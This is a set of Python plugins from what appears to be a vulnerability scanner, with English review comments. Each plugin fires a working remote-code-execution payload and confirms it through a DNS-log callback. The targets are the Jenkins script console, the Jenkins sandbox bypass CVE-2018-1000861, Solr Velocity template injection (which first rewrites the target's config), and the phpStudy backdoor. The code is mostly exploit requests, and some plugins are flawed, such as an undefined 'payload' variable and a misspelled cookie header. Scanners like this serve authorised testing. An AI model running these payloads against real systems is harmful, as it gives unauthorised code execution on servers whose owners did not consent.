def medusa(**kwargs)->None:
    """Probe a Jenkins script console (``/script``) for unauthenticated Groovy execution.

    The check is out-of-band: a form body containing
    ``println "ping <dnslog-host>".execute().text`` is POSTed to ``<Url>/script``
    and the finding is reported only when the DNS-log helper sees a callback
    (``DL.result()``). Nothing in the HTTP response body is inspected for the verdict.

    Keyword Args:
        Url: target base URL; ``/script`` is appended verbatim (no slash handling).
        Headers: header dict for the requests. It is mutated in place: the
            Content-Type, Accept and cookie entries are written into the caller's dict.
        Proxies: ``requests``-style proxies mapping, or None.

    Side effects: rebinds the module-level globals ``resp``/``resp2``; on a hit,
    writes the finding through ``ClassCongregation.VulnerabilityDetails`` and
    ``WriteFile``. Every exception is routed to ``ErrorHandling``/``ErrorLog``
    and never re-raised, so callers get no signal on failure.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied header dict (mutated below)
    proxies = kwargs.get("Proxies")  # caller-supplied proxies mapping
    global resp
    global resp2
    DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
    DL.dns_host()
    # URL-encoded form body; the DNS-log hostname is substituted twice (script= and json=).
    # The Jenkins-Crumb value is a hard-coded literal, not a token fetched from the target.
    post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
        DL.dns_host(), DL.dns_host())
    payload = "/script"

    try:
        payload_url = url + payload
        s = requests.session()
        # Regex-match the cookie string out of the repr() of the session's cookie jar.
        # If the GET sets no cookie, findall() is empty and the [0] raises IndexError,
        # which the broad except below turns into a logged error (no finding).
        cookises=re.compile('.*Cookie (.*) for.*').findall(str(s.get(payload_url,timeout=6,proxies=proxies,verify=False).cookies))[0]#regex-extract the Cookie string

        Headers['Content-Type']='application/x-www-form-urlencoded'
        Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        Headers['Cookis']=cookises  # note: key is spelled 'Cookis', not the standard 'Cookie' header
        resp = s.post(payload_url,headers=Headers, data=post_data,timeout=6,proxies=proxies, verify=False)  # verify=False: TLS certificate checking disabled

        con = resp.text
        if DL.result():  # callback observed on the DNS-log host -> report the finding
            Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(url, payload_url,con,DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the finding; the Response object is passed here, where sibling plugins pass the url
            ClassCongregation.WriteFile().result(str(url),str(Medusa))#append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: network, parse and index errors are all logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#write the error-log entry
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Probe Apache Solr for the VelocityResponseWriter template-injection check.

    Flow: (1) GET ``/solr/admin/cores`` and take the last core name listed under
    ``status``; (2) POST a config change enabling the ``velocity`` response writer
    on ``/solr/<core>/config``; (3) GET ``/solr/<core>/select`` with a Velocity
    template that runs ``ping <dnslog-host>``. The finding is reported only when
    the DNS-log helper sees the callback (``DL.result()``); the response body
    ``con2`` is fetched but not used for the verdict.

    Args:
        Url: target URL; split into scheme/host/port by ``UrlProcessing``.
        Headers: header dict. It is mutated in place — ``Headers1`` and ``Headers2``
            below are aliases of this same object, not copies.
        proxies: proxy setting passed through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails`` on a hit.

    Side effects: writes the finding via ``ClassCongregation`` on a hit; every
    exception is logged through ``ErrorHandling``/``ErrorLog`` and swallowed.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:

        Headers1=Headers  # alias, not a copy: edits below land in the caller's dict
        Headers1['Content-Type']='application/x-www-form-urlencoded'
        payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores'
        step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers1).text  # note: no verify=False here, unlike the later requests
        data = json.loads(step1)  # non-JSON body raises and is logged by the except below
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # keeps the last key iterated, i.e. the last core listed
            payload = "/solr/"+name+"/config"

            DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
            # Velocity template query; the DNS-log hostname is substituted into the exec'd ping.
            payload2 = '/solr/'+name+'/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(DL.dns_host())

            payload_url1 = scheme + "://" + url +":"+ str(port)+ payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2

            # Config API body that enables the Velocity response writer with resource loading on.
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            Headers2 = Headers  # same object as Headers1, so this Content-Type also applies to the GET below
            Headers2['Content-Type']='application/json'

            resp = requests.post(payload_url1,data=payload_data,headers=Headers2,proxies=proxies, timeout=6, verify=False)  # verify=False: TLS certificate checking disabled
            resp2 = requests.get(payload_url2, headers=Headers1, timeout=6,proxies=proxies, verify=False)
            con2 = resp2.text
            if DL.result() :  # callback observed on the DNS-log host -> report the finding
                # Three arguments but only two {} placeholders: str.format ignores the
                # surplus, so con2 is silently dropped and DL.dns_host() fills the DNSlog slot.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(url,con2,DL.dns_host())
                _t=VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()  # record the finding (url plus scan data)
                ClassCongregation.WriteFile().result(str(url),str(Medusa))#append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: network, JSON and key errors are all logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#write the error-log entry
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Probe a Jenkins script console (``/script``) for unauthenticated Groovy execution.

    Variant of the ``**kwargs`` plugin that builds its own header dict from
    ``RandomAgent`` instead of mutating a caller-supplied one. The verdict is
    out-of-band only: a ``println "ping <dnslog-host>".execute().text`` form body
    is POSTed and the finding is reported when ``DL.result()`` sees the callback.

    Args:
        Url: target URL; split into scheme/host/port by ``UrlProcessing``.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy setting passed through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails`` on a hit.

    Side effects: rebinds the module-level globals ``resp``/``resp2``; writes the
    finding via ``ClassCongregation`` on a hit; every exception is logged and swallowed.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    global resp
    global resp2
    DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
    DL.dns_host()
    # URL-encoded form body; the DNS-log hostname is substituted twice (script= and json=).
    # The Jenkins-Crumb value is a hard-coded literal, not a token fetched from the target.
    post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(
        DL.dns_host(), DL.dns_host())
    payload = "/script"

    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        s = requests.session()
        # Regex-match the cookie string out of the repr() of the session's cookie jar.
        # If the GET sets no cookie, findall() is empty and the [0] raises IndexError,
        # which the broad except below turns into a logged error (no finding).
        cookises = re.compile('.*Cookie (.*) for.*').findall(
            str(
                s.get(payload_url, timeout=6, proxies=proxies,
                      verify=False).cookies))[0]  # regex-extract the Cookie string
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Cookis': cookises  # note: key is spelled 'Cookis', not the standard 'Cookie' header
        }
        resp = s.post(payload_url,
                      headers=headers,
                      data=post_data,
                      timeout=6,
                      proxies=proxies,
                      verify=False)  # verify=False: TLS certificate checking disabled

        con = resp.text
        if DL.result():  # callback observed on the DNS-log host -> report the finding
            Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
                url, payload_url, con, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record the finding (url plus scan data)
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: network, parse and index errors are all logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Logs (url, plugin name); the exception object `e` is not passed here,
        # unlike the sibling plugins that log ("Plugin Name:... || Target Url:...", e).
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error-log entry
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Probe Jenkins for the script-security sandbox bypass (CVE-2018-1000861).

    A Groovy class whose constructor runs ``"curl <dnslog-host>".execute()`` is
    percent-encoded into the ``value`` parameter of the ``SecureGroovyScript``
    ``checkScript`` endpoint and POSTed. The verdict is out-of-band only: the
    finding is reported when ``DL.result()`` sees the DNS-log callback; the
    response body ``con`` is included in the report but not used for the decision.

    Args:
        Url: target URL; split into scheme/host/port by ``UrlProcessing``.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy setting passed through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails`` on a hit.

    Side effects: writes the finding via ``ClassCongregation`` on a hit; every
    exception is logged through ``ErrorHandling``/``ErrorLog`` and swallowed.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:
        DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
        # Groovy source; the DNS-log hostname is substituted into the constructor body.
        a = '''public class x {
          public x(){
            "curl %s".execute()
          }
        }''' % DL.dns_host()
        payload2 = urllib.parse.quote(a)  # percent-encode the Groovy source for the query string
        payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
        payload_url = scheme + "://" + url + ':' + str(
            port) + payload1 + payload2
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept-Encoding':
            'gzip, deflate',
            'Accept-Language':
            'en',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url,
                             headers=headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)  # POST with no body; verify=False disables TLS certificate checking
        con = resp.text
        if DL.result():  # callback observed on the DNS-log host -> report the finding
            Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
                url, payload_url, con, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record the finding (url plus scan data)
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: any network or helper error is logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # write the error-log entry
def medusa(Url, RandomAgent, proxies=None, **kwargs) -> None:
    """Probe for the phpStudy backdoor via a base64 ``accept-charset`` header.

    A PHP ``system("curl http://<dnslog-host>");`` statement is base64-encoded
    and sent in the ``accept-charset`` request header of a single GET. The verdict
    is out-of-band only: the finding is reported when ``DL.result()`` sees the
    DNS-log callback; the HTTP response is not inspected.

    Args:
        Url: target URL; split into scheme/host/port by ``UrlProcessing``.
        RandomAgent: value used for the User-Agent header.
        proxies: proxy setting passed through ``ClassCongregation.Proxies().result``.
        **kwargs: forwarded to ``VulnerabilityDetails`` on a hit.

    Side effects: writes the finding via ``ClassCongregation`` on a hit; every
    exception (including a NameError, see ``payload`` below) is logged and swallowed.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
    commandS = ('''system("curl http://{}");''').format(DL.dns_host())
    cmd = base64.b64encode(commandS.encode('utf-8'))  # bytes, used directly as a header value below
    try:
        # NOTE(review): `payload` is not defined anywhere in this function. It is
        # presumably a module-level constant; if it is not, the NameError raised here
        # is swallowed by the except below and the plugin never reports anything.
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,  # the base64-encoded PHP statement rides in this header
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        s = requests.session()
        resp = s.get(payload_url,
                     headers=headers,
                     timeout=5,
                     proxies=proxies,
                     verify=False)  # verify=False: TLS certificate checking disabled; resp is not inspected
        if DL.result():  # callback observed on the DNS-log host -> report the finding
            Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format(
                url, payload_url, headers, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record the finding (url plus scan data)
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: network and name errors are all logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Logs (url, plugin name); the exception object `e` is not passed here,
        # unlike the sibling plugins that log ("Plugin Name:... || Target Url:...", e).
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error-log entry
def medusa(**kwargs) -> None:
    """Probe Jenkins for the script-security sandbox bypass (CVE-2018-1000861).

    ``**kwargs`` variant: the Groovy class whose constructor runs
    ``"curl <dnslog-host>".execute()`` is percent-encoded into the ``value``
    parameter of the ``SecureGroovyScript`` ``checkScript`` endpoint and POSTed
    to ``<Url>`` + that path. The verdict is out-of-band only: the finding is
    reported when ``DL.result()`` sees the DNS-log callback.

    Keyword Args:
        Url: target base URL; the endpoint path is appended verbatim.
        Headers: header dict for the request. It is mutated in place
            (Content-Type and Accept are written into the caller's dict).
        Proxies: ``requests``-style proxies mapping, or None.

    Side effects: writes the finding via ``ClassCongregation`` on a hit; every
    exception is logged through ``ErrorHandling``/``ErrorLog`` and swallowed.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied header dict (mutated below)
    proxies = kwargs.get("Proxies")  # caller-supplied proxies mapping
    try:
        DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
        # Groovy source; the DNS-log hostname is substituted into the constructor body.
        a = '''public class x {
          public x(){
            "curl %s".execute()
          }
        }''' % DL.dns_host()
        payload2 = urllib.parse.quote(a)  # percent-encode the Groovy source for the query string
        payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
        payload_url = url + payload1 + payload2

        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers[
            'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        resp = requests.post(payload_url,
                             headers=Headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)  # POST with no body; verify=False disables TLS certificate checking
        con = resp.text
        if DL.result():  # callback observed on the DNS-log host -> report the finding
            Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(
                url, payload_url, con, DL.dns_host())
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # record the finding; the Response object is passed here, where sibling plugins pass the url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: any network or helper error is logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  # write the error-log entry
def medusa(Url, RandomAgent, Token, proxies=None) -> None:
    """Probe Apache Solr for the VelocityResponseWriter template-injection check.

    Flow: (1) GET ``/solr/admin/cores`` and take the last core name listed under
    ``status``; (2) POST a config change enabling the ``velocity`` response writer
    on ``/solr/<core>/config``; (3) GET ``/solr/<core>/select`` with a Velocity
    template that runs ``ping <dnslog-host>``. The finding is reported only when
    the DNS-log helper sees the callback (``DL.result()``); the response body
    ``con2`` is fetched but not used for the verdict.

    Args:
        Url: target URL; split into scheme/host/port by ``UrlProcessing``.
        RandomAgent: value used for the User-Agent header.
        Token: passed positionally to ``VulnerabilityDetails`` on a hit (the
            sibling plugins forward ``**kwargs`` there instead).
        proxies: proxy setting passed through ``ClassCongregation.Proxies().result``.

    Side effects: writes the finding via ``ClassCongregation`` on a hit; every
    exception is logged through ``ErrorHandling``/``ErrorLog`` and swallowed.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as-is
    try:

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(
            port) + '/solr/admin/cores'
        step1 = requests.get(payload_url,
                             timeout=6,
                             proxies=proxies,
                             headers=headers).text  # note: no verify=False here, unlike the later requests
        data = json.loads(step1)  # non-JSON body raises and is logged by the except below
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # keeps the last key iterated, i.e. the last core listed
            payload = "/solr/" + name + "/config"

            DL = ClassCongregation.Dnslog()  # DNS-log helper used for out-of-band confirmation
            # Velocity template query; the DNS-log hostname is substituted into the exec'd ping.
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(
                DL.dns_host())

            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2

            # Config API body that enables the Velocity response writer with resource loading on.
            payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
            headers1 = {  # separate dict for the JSON POST; `headers` above stays form-encoded
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept':
                'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language':
                'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            resp = requests.post(payload_url1,
                                 data=payload_data,
                                 headers=headers1,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)  # verify=False: TLS certificate checking disabled
            resp2 = requests.get(payload_url2,
                                 headers=headers,
                                 timeout=6,
                                 proxies=proxies,
                                 verify=False)
            con2 = resp2.text
            if DL.result():  # callback observed on the DNS-log host -> report the finding
                # Three arguments but only two {} placeholders: str.format ignores the
                # surplus, so con2 is silently dropped and DL.dns_host() fills the DNSlog slot.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(
                    url, con2, DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, Token).Write()  # record the finding; Token is passed positionally here
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # append to the result file keyed by url; Medusa is the report text
    except Exception as e:  # broad catch: network, JSON and key errors are all logged, never raised
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Logs (url, plugin name); the exception object `e` is not passed here,
        # unlike the sibling plugins that log ("Plugin Name:... || Target Url:...", e).
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the error-log entry with the URL and plugin name